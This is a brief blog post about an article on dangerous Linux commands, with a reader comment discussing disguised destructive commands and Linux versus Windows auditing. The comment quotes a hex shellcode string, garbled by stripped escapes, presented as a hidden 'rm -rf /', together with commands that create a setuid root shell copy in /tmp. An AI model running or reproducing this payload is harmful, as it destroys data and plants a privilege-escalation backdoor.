Seven Deadly LINUX Commands

This article reminds me of just one more reason I like command line instructions that say what they mean. And no, I’m not saying that Windows is much (if any) better. This is why I miss my DCL. 🙁

Of course that article is another reason not to run at elevated privileges on any operating system.

One Response to “Seven Deadly LINUX Commands”

  1. Matt says:

    char esp[] __attribute__ ((section(“.text”))) /* e.s.p
    release */
    = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68”
    “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
    “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
    “x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
    “x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
    “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
    “x6ex2fx73x68x00x2dx63x00”
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

    Except that “even the rather experienced Linux users” would probably be smart enough to not run a lengthy string of hex that they found on the Internet as a command?

    None of those commands scare me much. The only one, really, is the first one, but experienced users tend to pause before running an “rm -rf,” much less one with wildcards.

    This reminds me of something I decided the other day, though: Linux can be tough to maintain, but it will always do what you tell it to. When the problems pop up, it’s usually either because you screwed something up, or because of hardware failure. A system that’s been running won’t one day stop working. Windows, by comparison, is easy to use, but can be pretty unpredictable.

    Case in point, we had someone breach someone’s account at work. With Linux, the commands were complex, but we were able to see every page they hit, figure out what was going on, and block them. The same user’s Exchange account was disabled later on. We can find no way of figuring out what happened, other than to guess. (We assume someone tried to brute-force the password and Exchange locked the account. There are no logs to confirm this, though.)
